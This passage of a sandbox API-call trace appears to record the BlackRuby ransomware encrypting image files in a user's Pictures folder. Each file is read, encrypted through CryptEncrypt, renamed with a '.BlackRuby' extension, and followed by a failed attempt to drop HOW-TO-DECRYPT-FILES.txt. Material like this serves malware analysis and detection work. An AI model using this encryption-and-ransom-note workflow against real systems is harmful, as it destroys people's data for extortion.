CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.831] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.831] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\kncfpz60A.gif", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\kncfpz60A.gif", lpFilePart=0x0) returned 0x27 [0060.831] GetLastError () returned 0x0 [0060.831] SetErrorMode (uMode=0x1) returned 0x0 [0060.831] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\kncfpz60A.gif" (normalized: "c:\\users\\eebsym5\\pictures\\kncfpz60a.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0060.833] GetLastError () returned 0xb7 [0060.833] GetFileType (hFile=0x258) returned 0x1 [0060.833] SetErrorMode (uMode=0x0) returned 0x1 [0060.833] GetFileType (hFile=0x258) returned 0x1 [0060.834] CloseHandle (hObject=0x258) returned 1 [0060.834] GetLastError () returned 0xb7 [0060.834] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\kncfpz60A.gif", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\kncfpz60A.gif", lpFilePart=0x0) returned 0x27 [0060.834] GetLastError () returned 0xb7 [0060.834] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_igvGRxOpG9NhvyLCqMODLQqKZVNx3gpSZrUJv.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_igvGRxOpG9NhvyLCqMODLQqKZVNx3gpSZrUJv.BlackRuby", lpFilePart=0x0) returned 0x53 [0060.834] GetLastError () returned 0xb7 [0060.834] SetErrorMode (uMode=0x1) returned 0x0 [0060.834] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\kncfpz60A.gif" (normalized: "c:\\users\\eebsym5\\pictures\\kncfpz60a.gif"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73243fa0, ftCreationTime.dwHighDateTime=0x1d355ea, ftLastAccessTime.dwLowDateTime=0x8f559050, ftLastAccessTime.dwHighDateTime=0x1d35196, ftLastWriteTime.dwLowDateTime=0x2c744280, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x11a90)) returned 1 [0060.834] GetLastError () returned 0xb7 [0060.834] SetErrorMode (uMode=0x0) returned 0x1 [0060.834] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\kncfpz60A.gif" (normalized: "c:\\users\\eebsym5\\pictures\\kncfpz60a.gif"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_igvGRxOpG9NhvyLCqMODLQqKZVNx3gpSZrUJv.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\encrypted_igvgrxopg9nhvylcqmodlqqkzvnx3gpszrujv.blackruby")) returned 1 [0060.835] GetLastError () returned 0xb7 [0060.835] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0060.835] GetLastError () returned 0xb7 [0060.835] SetErrorMode (uMode=0x1) returned 0x0 [0060.835] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\pictures\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0060.836] GetLastError () returned 0x5 [0060.836] SetErrorMode (uMode=0x0) returned 0x1 [0060.836] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\m8_bSj7hogNFrQv_.bmp", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\m8_bSj7hogNFrQv_.bmp", lpFilePart=0x0) returned 0x2e [0060.837] GetLastError () returned 0x5 [0060.837] SetErrorMode (uMode=0x1) returned 0x0 [0060.837] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\m8_bSj7hogNFrQv_.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\m8_bsj7hognfrqv_.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1cdb688 | out: lpFileInformation=0x1cdb688*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe513ba80, ftCreationTime.dwHighDateTime=0x1d35501, ftLastAccessTime.dwLowDateTime=0xf9f10800, ftLastAccessTime.dwHighDateTime=0x1d34f74, ftLastWriteTime.dwLowDateTime=0xf9f10800, ftLastWriteTime.dwHighDateTime=0x1d34f74, nFileSizeHigh=0x0, nFileSizeLow=0x6c94)) returned 1 [0060.837] GetLastError () returned 0x5 [0060.837] SetErrorMode (uMode=0x0) returned 0x1 [0060.837] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\m8_bSj7hogNFrQv_.bmp", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\m8_bSj7hogNFrQv_.bmp", lpFilePart=0x0) returned 0x2e [0060.837] GetLastError () returned 0x5 [0060.837] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\m8_bSj7hogNFrQv_.bmp", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\m8_bSj7hogNFrQv_.bmp", lpFilePart=0x0) returned 0x2e [0060.837] GetLastError () returned 0x5 [0060.837] SetErrorMode (uMode=0x1) returned 0x0 [0060.837] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\m8_bSj7hogNFrQv_.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\m8_bsj7hognfrqv_.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0060.837] GetLastError () returned 0x0 [0060.837] GetFileType (hFile=0x258) returned 0x1 [0060.837] SetErrorMode (uMode=0x0) returned 0x1 [0060.837] GetFileType (hFile=0x258) returned 0x1 [0060.837] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x6c94 [0060.837] GetLastError () returned 0x0 [0060.837] ReadFile (in: hFile=0x258, lpBuffer=0x1cdd1c8, nNumberOfBytesToRead=0x6c94, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1cdd1c8*, lpNumberOfBytesRead=0x18ed84*=0x6c94, lpOverlapped=0x0) returned 1 [0060.838] GetLastError () returned 0x0 [0060.838] CloseHandle (hObject=0x258) returned 1 [0060.838] GetLastError () returned 0x0 [0060.838] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\m8_bSj7hogNFrQv_.bmp", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\m8_bSj7hogNFrQv_.bmp", lpFilePart=0x0) returned 0x2e [0060.838] GetLastError () returned 0x0 [0060.838] SetErrorMode (uMode=0x1) returned 0x0 [0060.838] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\m8_bSj7hogNFrQv_.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\m8_bsj7hognfrqv_.bmp"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe513ba80, ftCreationTime.dwHighDateTime=0x1d35501, ftLastAccessTime.dwLowDateTime=0xf9f10800, ftLastAccessTime.dwHighDateTime=0x1d34f74, ftLastWriteTime.dwLowDateTime=0xf9f10800, ftLastWriteTime.dwHighDateTime=0x1d34f74, nFileSizeHigh=0x0, nFileSizeLow=0x6c94)) returned 1 [0060.838] GetLastError () returned 0x0 [0060.838] SetErrorMode (uMode=0x0) returned 0x1 [0060.849] CryptImportKey (in: hProv=0x37c790, pbData=0x1d44eb0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360f60) returned 1 [0060.849] GetLastError () returned 0x0 [0060.849] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.849] GetLastError () returned 0x0 [0060.881] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.881] GetLastError () returned 0x0 [0060.881] CryptDuplicateKey (in: hKey=0x360f60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360b60) returned 1 [0060.881] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.881] GetLastError () returned 0x0 [0060.881] CryptSetKeyParam (hKey=0x360b60, dwParam=0x4, pbData=0x1b6d560*=0x1, dwFlags=0x0) returned 1 [0060.881] GetLastError () returned 0x0 [0060.881] CryptSetKeyParam (hKey=0x360b60, dwParam=0x1, pbData=0x1b6d52c, dwFlags=0x0) returned 1 [0060.881] GetLastError () returned 0x0 [0060.881] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b6d5a8*, pdwDataLen=0x18ed74*=0x6d90, dwBufLen=0x6d90 | out: pbData=0x1b6d5a8*, pdwDataLen=0x18ed74*=0x6d90) returned 1 [0060.881] GetLastError () returned 0x0 [0060.881] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b7b0f4*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1b7b0f4*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0060.881] GetLastError () returned 0x0 [0060.881] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b7b124*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1b7b124*, pdwDataLen=0x18ed94*=0x10) returned 1 [0060.881] GetLastError () returned 0x0 [0060.881] CryptDestroyKey (hKey=0x360f60) returned 1 [0060.881] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0060.881] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0060.881] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\m8_bSj7hogNFrQv_.bmp", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\m8_bSj7hogNFrQv_.bmp", lpFilePart=0x0) returned 0x2e [0060.881] GetLastError () returned 0x0 [0060.881] SetErrorMode (uMode=0x1) returned 0x0 [0060.881] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\m8_bSj7hogNFrQv_.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\m8_bsj7hognfrqv_.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0060.882] GetLastError () returned 0xb7 [0060.882] GetFileType (hFile=0x258) returned 0x1 [0060.882] SetErrorMode (uMode=0x0) returned 0x1 [0060.882] GetFileType (hFile=0x258) returned 0x1 [0060.883] CloseHandle (hObject=0x258) returned 1 [0060.884] GetLastError () returned 0xb7 [0060.884] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\m8_bSj7hogNFrQv_.bmp", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\m8_bSj7hogNFrQv_.bmp", lpFilePart=0x0) returned 0x2e [0060.884] GetLastError () returned 0xb7 [0060.884] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_Dpk3eZTWE2HKrB6WNbCKdCupA4sf6fwwivUPG.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_Dpk3eZTWE2HKrB6WNbCKdCupA4sf6fwwivUPG.BlackRuby", lpFilePart=0x0) returned 0x53 [0060.884] GetLastError () returned 0xb7 [0060.884] SetErrorMode (uMode=0x1) returned 0x0 [0060.884] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\m8_bSj7hogNFrQv_.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\m8_bsj7hognfrqv_.bmp"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe513ba80, ftCreationTime.dwHighDateTime=0x1d35501, ftLastAccessTime.dwLowDateTime=0xf9f10800, ftLastAccessTime.dwHighDateTime=0x1d34f74, ftLastWriteTime.dwLowDateTime=0x2c7b66a0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x6da0)) returned 1 [0060.884] GetLastError () returned 0xb7 [0060.884] SetErrorMode (uMode=0x0) returned 0x1 [0060.884] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\m8_bSj7hogNFrQv_.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\m8_bsj7hognfrqv_.bmp"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_Dpk3eZTWE2HKrB6WNbCKdCupA4sf6fwwivUPG.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\encrypted_dpk3eztwe2hkrb6wnbckdcupa4sf6fwwivupg.blackruby")) returned 1 [0060.884] GetLastError () returned 0xb7 [0060.885] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0060.885] GetLastError () returned 0xb7 [0060.885] SetErrorMode (uMode=0x1) returned 0x0 [0060.885] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\pictures\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0060.885] GetLastError () returned 0x5 [0060.886] SetErrorMode (uMode=0x0) returned 0x1 [0060.886] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\OqWFN1IZUXv7JLyp2.gif", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\OqWFN1IZUXv7JLyp2.gif", lpFilePart=0x0) returned 0x2f [0060.886] GetLastError () returned 0x5 [0060.886] SetErrorMode (uMode=0x1) returned 0x0 [0060.886] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\OqWFN1IZUXv7JLyp2.gif" (normalized: "c:\\users\\eebsym5\\pictures\\oqwfn1izuxv7jlyp2.gif"), fInfoLevelId=0x0, lpFileInformation=0x1bacb0c | out: lpFileInformation=0x1bacb0c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x491dbd60, ftCreationTime.dwHighDateTime=0x1d35565, ftLastAccessTime.dwLowDateTime=0x3324cbf0, ftLastAccessTime.dwHighDateTime=0x1d352c9, ftLastWriteTime.dwLowDateTime=0x3324cbf0, ftLastWriteTime.dwHighDateTime=0x1d352c9, nFileSizeHigh=0x0, nFileSizeLow=0x16605)) returned 1 [0060.886] GetLastError () returned 0x5 [0060.886] SetErrorMode (uMode=0x0) returned 0x1 [0060.886] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\OqWFN1IZUXv7JLyp2.gif", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\OqWFN1IZUXv7JLyp2.gif", lpFilePart=0x0) returned 0x2f [0060.886] GetLastError () returned 0x5 [0060.886] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\OqWFN1IZUXv7JLyp2.gif", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\OqWFN1IZUXv7JLyp2.gif", lpFilePart=0x0) returned 0x2f [0060.886] GetLastError () returned 0x5 [0060.886] SetErrorMode (uMode=0x1) returned 0x0 [0060.886] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\OqWFN1IZUXv7JLyp2.gif" (normalized: "c:\\users\\eebsym5\\pictures\\oqwfn1izuxv7jlyp2.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0060.886] GetLastError () returned 0x0 [0060.886] GetFileType (hFile=0x258) returned 0x1 [0060.886] SetErrorMode (uMode=0x0) returned 0x1 [0060.887] GetFileType (hFile=0x258) returned 0x1 [0060.887] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x16605 [0060.887] GetLastError () returned 0x0 [0060.887] ReadFile (in: hFile=0x258, lpBuffer=0x2d890b0, nNumberOfBytesToRead=0x16605, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x2d890b0*, lpNumberOfBytesRead=0x18ed84*=0x16605, lpOverlapped=0x0) returned 1 [0060.888] GetLastError () returned 0x0 [0060.888] CloseHandle (hObject=0x258) returned 1 [0060.888] GetLastError () returned 0x0 [0060.889] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\OqWFN1IZUXv7JLyp2.gif", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\OqWFN1IZUXv7JLyp2.gif", lpFilePart=0x0) returned 0x2f [0060.889] GetLastError () returned 0x0 [0060.889] SetErrorMode (uMode=0x1) returned 0x0 [0060.889] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\OqWFN1IZUXv7JLyp2.gif" (normalized: "c:\\users\\eebsym5\\pictures\\oqwfn1izuxv7jlyp2.gif"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x491dbd60, ftCreationTime.dwHighDateTime=0x1d35565, ftLastAccessTime.dwLowDateTime=0x3324cbf0, ftLastAccessTime.dwHighDateTime=0x1d352c9, ftLastWriteTime.dwLowDateTime=0x3324cbf0, ftLastWriteTime.dwHighDateTime=0x1d352c9, nFileSizeHigh=0x0, nFileSizeLow=0x16605)) returned 1 [0060.889] GetLastError () returned 0x0 [0060.889] SetErrorMode (uMode=0x0) returned 0x1 [0060.899] CryptImportKey (in: hProv=0x37c818, pbData=0x1c08e00, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360d60) returned 1 [0060.899] GetLastError () returned 0x0 [0060.899] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.899] GetLastError () returned 0x0 [0060.929] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.929] GetLastError () returned 0x0 [0060.929] CryptDuplicateKey (in: hKey=0x360d60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360f20) returned 1 [0060.929] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.929] GetLastError () returned 0x0 [0060.929] CryptSetKeyParam (hKey=0x360f20, dwParam=0x4, pbData=0x1c35e4c*=0x1, dwFlags=0x0) returned 1 [0060.929] GetLastError () returned 0x0 [0060.929] CryptSetKeyParam (hKey=0x360f20, dwParam=0x1, pbData=0x1c35e18, dwFlags=0x0) returned 1 [0060.929] GetLastError () returned 0x0 [0060.930] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2db5e00*, pdwDataLen=0x18ed74*=0x16700, dwBufLen=0x16700 | out: pbData=0x2db5e00*, pdwDataLen=0x18ed74*=0x16700) returned 1 [0060.930] GetLastError () returned 0x0 [0060.931] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c35ea8*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c35ea8*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0060.931] GetLastError () returned 0x0 [0060.931] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c35ed8*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c35ed8*, pdwDataLen=0x18ed94*=0x10) returned 1 [0060.931] GetLastError () returned 0x0 [0060.942] CryptDestroyKey (hKey=0x360d60) returned 1 [0060.942] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0060.942] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0060.942] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\OqWFN1IZUXv7JLyp2.gif", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\OqWFN1IZUXv7JLyp2.gif", lpFilePart=0x0) returned 0x2f [0060.942] GetLastError () returned 0x0 [0060.942] SetErrorMode (uMode=0x1) returned 0x0 [0060.942] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\OqWFN1IZUXv7JLyp2.gif" (normalized: "c:\\users\\eebsym5\\pictures\\oqwfn1izuxv7jlyp2.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0060.943] GetLastError () returned 0xb7 [0060.943] GetFileType (hFile=0x258) returned 0x1 [0060.943] SetErrorMode (uMode=0x0) returned 0x1 [0060.943] GetFileType (hFile=0x258) returned 0x1 [0060.945] CloseHandle (hObject=0x258) returned 1 [0060.945] GetLastError () returned 0xb7 [0060.945] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\OqWFN1IZUXv7JLyp2.gif", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\OqWFN1IZUXv7JLyp2.gif", lpFilePart=0x0) returned 0x2f [0060.945] GetLastError () returned 0xb7 [0060.945] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_1gmFic4KYeydJ5QHVsPZA0KROT1ew2KqtLWLIEsdD1wV.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_1gmFic4KYeydJ5QHVsPZA0KROT1ew2KqtLWLIEsdD1wV.BlackRuby", lpFilePart=0x0) returned 0x5a [0060.945] GetLastError () returned 0xb7 [0060.945] SetErrorMode (uMode=0x1) returned 0x0 [0060.945] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\OqWFN1IZUXv7JLyp2.gif" (normalized: "c:\\users\\eebsym5\\pictures\\oqwfn1izuxv7jlyp2.gif"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x491dbd60, ftCreationTime.dwHighDateTime=0x1d35565, ftLastAccessTime.dwLowDateTime=0x3324cbf0, ftLastAccessTime.dwHighDateTime=0x1d352c9, ftLastWriteTime.dwLowDateTime=0x2c84ec20, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x16710)) returned 1 [0060.945] GetLastError () returned 0xb7 [0060.945] SetErrorMode (uMode=0x0) returned 0x1 [0060.945] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\OqWFN1IZUXv7JLyp2.gif" (normalized: "c:\\users\\eebsym5\\pictures\\oqwfn1izuxv7jlyp2.gif"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_1gmFic4KYeydJ5QHVsPZA0KROT1ew2KqtLWLIEsdD1wV.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\encrypted_1gmfic4kyeydj5qhvspza0krot1ew2kqtlwliesdd1wv.blackruby")) returned 1 [0060.946] GetLastError () returned 0xb7 [0060.946] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0060.946] GetLastError () returned 0xb7 [0060.946] SetErrorMode (uMode=0x1) returned 0x0 [0060.946] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\pictures\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0060.946] GetLastError () returned 0x5 [0060.947] SetErrorMode (uMode=0x0) returned 0x1 [0060.948] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\V0DdHuzSb0.jpg", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\V0DdHuzSb0.jpg", lpFilePart=0x0) returned 0x28 [0060.948] GetLastError () returned 0x5 [0060.948] SetErrorMode (uMode=0x1) returned 0x0 [0060.948] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\V0DdHuzSb0.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\v0ddhuzsb0.jpg"), fInfoLevelId=0x0, lpFileInformation=0x1b3fc08 | out: lpFileInformation=0x1b3fc08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x266929f0, ftCreationTime.dwHighDateTime=0x1d34cee, ftLastAccessTime.dwLowDateTime=0x2472dc70, ftLastAccessTime.dwHighDateTime=0x1d34e94, ftLastWriteTime.dwLowDateTime=0x2472dc70, ftLastWriteTime.dwHighDateTime=0x1d34e94, nFileSizeHigh=0x0, nFileSizeLow=0xf4f9)) returned 1 [0060.948] GetLastError () returned 0x5 [0060.948] SetErrorMode (uMode=0x0) returned 0x1 [0060.948] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\V0DdHuzSb0.jpg", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\V0DdHuzSb0.jpg", lpFilePart=0x0) returned 0x28 [0060.948] GetLastError () returned 0x5 [0060.948] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\V0DdHuzSb0.jpg", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\V0DdHuzSb0.jpg", lpFilePart=0x0) returned 0x28 [0060.948] GetLastError () returned 0x5 [0060.948] SetErrorMode (uMode=0x1) returned 0x0 [0060.948] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\V0DdHuzSb0.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\v0ddhuzsb0.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0060.948] GetLastError () returned 0x0 [0060.948] GetFileType (hFile=0x258) returned 0x1 [0060.948] SetErrorMode (uMode=0x0) returned 0x1 [0060.948] GetFileType (hFile=0x258) returned 0x1 [0060.949] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18eddc | out: 